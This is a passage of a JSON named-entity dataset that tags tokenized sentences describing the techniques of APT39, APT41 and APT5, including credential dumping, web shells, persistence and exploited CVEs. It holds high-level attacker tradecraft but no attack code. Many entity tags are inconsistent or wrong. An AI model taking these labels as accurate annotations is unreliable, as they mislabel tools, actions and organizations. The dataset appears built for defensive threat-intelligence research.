"B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "B-SamFile" ] }, { "tokens": [ "APT39", "has", "used", "CrackMapExec", "and", "a", "custom", "port", "scanner", "known", "as", "BLUETORCH", "for", "network", "scanning." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "the", "post", "exploitation", "tool", "CrackMapExec", "to", "enumerate", "network", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "different", "versions", "of", "Mimikatz", "to", "obtain", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "PowerShell", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "a", "command", "line", "utility", "and", "a", "network", "scanner", "written", "in", "python." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "various", "strains", "of", "malware", "to", "query", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "maintained", "persistence", "using", "the", "startup", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "been", "seen", "using", "RDP", "for", "lateral", "movement", "and", "persistence,", "in", "some", "cases", "employing", "the", "rdpwinst", "tool", "for", "mangement", "of", "multiple", "sessions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "NBTscan", "and", "custom", "tools", "to", "discover", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "SMB", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT39", "used", "secure", "shell", "(SSH)", "to", "move", "laterally", "among", "their", "targets." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "created", "scheduled", "tasks", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "a", "screen", "capture", "utility", "to", "take", "screenshots", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "post-exploitation", "tools", "including", "RemCom", "and", "the", "Non-sucking", "Service", "Manager", "(NSSM)", "to", "execute", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "modified", "LNK", "shortcuts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "packed", "tools", "with", "UPX,", "and", "has", "repacked", "a", "modified", "version", "of", "Mimikatz", "to", "thwart", "anti-virus", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "leveraged", "spearphishing", "emails", "with", "malicious", "attachments", "to", "initially", "compromise", "victims." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "leveraged", "spearphishing", "emails", "with", "malicious", "links", "to", "initially", "compromise", "victims." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "used", "Remexi", "to", "collect", "usernames", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "modified", "and", "used", "customized", "versions", "of", "publicly-available", "tools", "like", "PLINK", "and", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "APT39", "has", "used", "stolen", "credentials", "to", "compromise", "Outlook", "Web", "Access", "(OWA)." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "utilized", "malicious", "VBS", "scripts", "in", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "HTTP", "in", "communications", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "installed", "ANTAK", "and", "ASPXSPY", "web", "shells." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "APT41", "leveraged", "sticky", "keys", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "added", "user", "accounts", "to", "the", "User", "and", "Admin", "groups." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "created", "a", "RAR", "archive", "of", "targeted", "files", "for", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "BITSAdmin", "to", "download", "and", "install", "payloads." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "deployed", "Master", "Boot", "Record", "bootkits", "on", "Windows", "systems", "to", "hide", "their", "malware", "and", "maintain", "persistence", "on", "victim", "systems." ], "ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "attempted", "to", "remove", "evidence", "of", "some", "of", "its", "activity", "by", "deleting", "Bash", "histories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "APT41", "attempted", "to", "remove", "evidence", "of", "some", "of", "its", "activity", "by", "clearing", "Windows", "security", "and", "system", "events." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "APT41", "cloned", "victim", "user", "Git", "repositories", "during", "intrusions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "leveraged", "code-signing", "certificates", "to", "sign", "malware", "when", "targeting", "both", "gaming", "and", "non-gaming", "organizations." ], "ner_tags": [ "B-Idus", "B-Org", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "APT41", "used", "compiled", "HTML", "(.chm)", "files", "for", "targeting." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "APT41", "gained", "access", "to", "production", "environments", "where", "they", "could", "inject", "malicious", "code", "into", "legitimate,", "signed", "files", "and", "widely", "distribute", "them", "to", "end", "users." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "support", "initial", "access,", "APT41", "gained", "access", "to", "databases", "with", "information", "about", "existing", "accounts", "as", "well", "as", "plaintext", "and", "hashed", "passwords." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "BrowserGhost,", "a", "tool", "designed", "to", "obtain", "credentials", "from", "browsers,", "to", "retrieve", "information", "from", "password", "stores." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "used", "search", "order", "hijacking", "to", "execute", "malicious", "payloads,", "such", "as", "Winnti", "RAT." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "APT41", "used", "legitimate", "executables", "to", "perform", "DLL", "side-loading", "of", "their", "malware." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "DNS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "a", "ransomware", "called", "Encryptor", "RaaS", "to", "encrypt", "files", "on", "the", "targeted", "systems", "and", "provide", "a", "ransom", "note", "to", "the", "user." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT41", "transfers", "post-exploitation", "files", "dividing", "the", "payload", "into", "fixed-size", "chunks", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "uploaded", "files", "and", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "legitimate", "websites", "for", "C2", "through", "dead", "drop", "resolvers", "(DDR),", "including", "GitHub,", "Pastebin,", "and", "Microsoft", "TechNet." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "APT41", "used", "built-in", "<code>net</code>", "commands", "to", "enumerate", "domain", "administrator", "users." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "used", "DGAs", "to", "change", "their", "C2", "servers", "monthly." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "configured", "payloads", "to", "load", "via", "LD_PRELOAD." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "To", "support", "initial", "access,", "APT41", "gained", "access", "to", "databases", "with", "information", "about", "existing", "accounts", "and", "lists", "of", "employees." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "APT41", "has", "encrypted", "payloads", "using", "the", "Data", "Protection", "API", "(DPAPI),", "which", "relies", "on", "keys", "tied", "to", "specific", "user", "accounts", "on", "specific", "machines.", "APT41", "has", "also", "environmentally", "keyed", "second", "stage", "malware", "with", "an", "RC5", "key", "derived", "in", "part", "from", "the", "infected", "system's", "volume", "serial", "number." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "exploited", "CVE-2020-10189", "against", "Zoho", "ManageEngine", "Desktop", "Central", "through", "unsafe", "deserialization,", "and", "CVE-2019-19781", "to", "compromise", "Citrix", "Application", "Delivery", "Controllers", "(ADC)", "and", "gateway", "devices.", "APT41", "leveraged", "vulnerabilities", "such", "as", "ProxyLogon", "exploitation", "or", "SQL", "injection", "for", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-Tool", "I-Way", "O", "O", "O" ] }, { "tokens": [ "APT41", "leveraged", "the", "follow", "exploits", "in", "their", "operations:", "CVE-2012-0158,", "CVE-2015-1641,", "CVE-2017-0199,", "CVE-2017-11882,", "and", "CVE-2019-3396." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "APT41", "compromised", "an", "online", "billing/payment", "service", "using", "VPN", "access", "between", "a", "third-party", "service", "provider", "and", "the", "targeted", "payment", "service." ], "ner_tags": [ "B-Idus", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O", "O", "B-Org", "B-Org" ] }, { "tokens": [ "APT41", "used", "the", "Steam", "community", "page", "as", "a", "fallback", "mechanism", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "deleted", "files", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "exploit", "payloads", "that", "initiate", "download", "via", "ftp." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT41", "has", "executed", "<code>file", "/bin/pwd</code>", "on", "exploited", "victims,", "perhaps", "to", "return", "architecture", "related", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "developed", "a", "custom", "injector", "that", "enables", "an", "Event", "Tracing", "for", "Windows", "(ETW)", "bypass,", "making", "malicious", "processes", "invisible", "to", "Windows", "logging." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "certutil", "to", "download", "additional", "files.", "APT41", "downloaded", "post-exploitation", "tools", "such", "as", "Cobalt", "Strike", "via", "command", "shell", "following", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "a", "keylogger", "called", "GEARSHIFT", "on", "a", "target", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "used", "hashdump,", "Mimikatz,", "and", "the", "Windows", "Credential", "Editor", "to", "dump", "password", "hashes", "from", "memory", "and", "authenticate", "to", "other", "user", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "uses", "remote", "shares", "to", "move", "and", "remotely", "execute", "payloads", "during", "lateral", "movemement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "built-in", "<code>net</code>", "commands", "to", "enumerate", "local", "administrator", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "created", "user", "accounts." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "B-Way", "O" ] }, { "tokens": [ "APT41", "has", "created", "services", "to", "appear", "as", "benign", "system", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "attempted", "to", "masquerade", "their", "files", "as", "popular", "anti-virus", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "a", "malware", "variant", "called", "GOODLUCK", "to", "modify", "the", "registry", "in", "order", "to", "steal", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "APT41", "used", "the", "storescyncsvc.dll", "BEACON", "backdoor", "to", "download", "a", "secondary", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "ntdsutil", "to", "obtain", "a", "copy", "of", "the", "victim", "environment", "<code>ntds.dit</code>", "file." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "a", "malware", "variant", "called", "WIDETONE", "to", "conduct", "port", "scans", "on", "specified", "subnets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "the", "<code>net", "share</code>", "command", "as", "part", "of", "network", "reconnaissance." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "VMProtected", "binaries", "in", "multiple", "intrusions." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "APT41", "uses", "tools", "such", "as", "Mimikatz", "to", "enable", "lateral", "movement", "via", "captured", "password", "hashes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "performed", "password", "brute-force", "attacks", "on", "the", "local", "admin", "account." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "<code>net", "group</code>", "commands", "to", "enumerate", "various", "Windows", "user", "groups", "and", "permissions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "leveraged", "PowerShell", "to", "deploy", "malware", "families", "in", "victims’", "environments." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "malware", "TIDYELF", "loaded", "the", "main", "WINTERLOVE", "component", "by", "injecting", "it", "into", "the", "iexplore.exe", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "APT41", "used", "a", "tool", "called", "CLASSFON", "to", "covertly", "proxy", "network", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "queried", "registry", "values", "to", "determine", "items", "such", "as", "configured", "RDP", "ports", "and", "network", "configurations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "created", "and", "modified", "startup", "files", "for", "persistence.", "APT41", "added", "a", "registry", "key", "in", "<code>HKLM\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Svchost</code>", "to", "establish", "persistence", "for", "Cobalt", "Strike." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "RDP", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT41", "deployed", "a", "Monero", "cryptocurrency", "mining", "tool", "in", "a", "victim’s", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "deployed", "rootkits", "on", "Linux", "systems." ], "ner_tags": [ "B-Idus", "B-Way", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "used", "rundll32.exe", "to", "execute", "a", "loader." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "transferred", "implant", "files", "using", "Windows", "Admin", "Shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "APT41", "uses", "the", "Chinese", "website", "fofa.su,", "similar", "to", "the", "Shodan", "scanning", "service,", "for", "passive", "scanning", "of", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "a", "compromised", "account", "to", "create", "a", "scheduled", "task", "on", "a", "system." ], "ner_tags": [ "B-Idus", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "extracted", "user", "account", "data", "from", "the", "Security", "Account", "Managerr", "(SAM),", "making", "a", "copy", "of", "this", "database", "from", "the", "registry", "using", "the", "<code>reg", "save</code>", "command", "or", "by", "exploiting", "volume", "shadow", "copies." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "svchost.exe", "and", "Net", "to", "execute", "a", "system", "service", "installed", "to", "launch", "a", "Cobalt", "Strike", "BEACON", "loader." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "APT41", "uses", "packers", "such", "as", "Themida", "to", "obfuscate", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "sent", "spearphishing", "emails", "with", "attachments", "such", "as", "compiled", "HTML", "(.chm)", "files", "to", "initially", "compromise", "their", "victims." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "uses", "multiple", "built-in", "commands", "such", "as", "<code>systeminfo</code>", "and", "`net", "config", "Workstation`", "to", "enumerate", "victim", "system", "basic", "configuration", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "collected", "MAC", "addresses", "from", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "enumerated", "IP", "addresses", "of", "network", "resources", "and", "used", "the", "<code>netstat</code>", "command", "as", "part", "of", "network", "reconnaissance.", "The", "group", "has", "also", "used", "a", "malware", "variant,", "HIGHNOON,", "to", "enumerate", "active", "RDP", "sessions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "executed", "<code>whoami</code>", "commands,", "including", "using", "the", "WMIEXEC", "utility", "to", "execute", "this", "on", "remote", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz,", "pwdump,", "PowerSploit,", "and", "Windows", "Credential", "Editor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "APT41", "executed", "<code>file", "/bin/pwd</code>", "in", "activity", "exploiting", "CVE-2019-19781", "against", "Citrix", "devices." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way", "O" ] }, { "tokens": [ "APT41", "used", "compromised", "credentials", "to", "log", "on", "to", "other", "systems." ], "ner_tags": [ "B-Idus", "B-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "the", "Acunetix", "SQL", "injection", "vulnerability", "scanner", "in", "target", "reconnaissance", "operations,", "as", "well", "as", "the", "JexBoss", "tool", "to", "identify", "vulnerabilities", "in", "Java", "applications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "used", "HTTP", "to", "download", "payloads", "for", "CVE-2019-19781", "and", "CVE-2020-10189", "exploits." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "APT41", "used", "<code>cmd.exe", "/c</code>", "to", "execute", "commands", "on", "remote", "machines.", "APT41", "used", "a", "batch", "file", "to", "install", "persistence", "for", "the", "Cobalt", "Strike", "BEACON", "loader." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "APT41", "used", "WMI", "in", "several", "ways,", "including", "for", "execution", "of", "commands", "via", "WMIEXEC", "as", "well", "as", "for", "persistence", "via", "PowerSploit." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT41", "modified", "legitimate", "Windows", "services", "to", "install", "malware", "backdoors.", "APT41", "created", "the", "StorSyncSvc", "service", "to", "provide", "persistence", "for", "Cobalt", "Strike." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT41", "leverages", "various", "tools", "and", "frameworks", "to", "brute-force", "directories", "on", "web", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "created", "their", "own", "accounts", "with", "Local", "Administrator", "privileges", "to", "maintain", "access", "to", "systems", "with", "short-cycle", "credential", "rotation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "the", "JAR/ZIP", "file", "format", "for", "exfiltrated", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "cleared", "the", "command", "history", "on", "targeted", "ESXi", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "APT5", "has", "accessed", "Microsoft", "M365", "cloud", "environments", "using", "stolen", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "APT5", "has", "modified", "legitimate", "binaries", "and", "scripts", "for", "Pulse", "Secure", "VPNs", "including", "the", "legitimate", "DSUpgrade.pm", "file", "to", "install", "the", "ATRIUM", "webshell", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "APT5", "has", "made", "modifications", "to", "the", "crontab", "file", "including", "in", "`/var/cron/tabs/`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "APT5", "has", "used", "legitimate", "account", "credentials", "to", "move", "laterally", "through", "compromised", "environments." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "exploited", "vulnerabilities", "in", "externally", "facing", "software", "and", "devices", "including", "Pulse", "Secure", "VPNs", "and", "Citrix", "Application", "Delivery", "Controllers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "APT5", "has", "deleted", "scripts", "and", "web", "shells", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "B-OffAct", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "the", 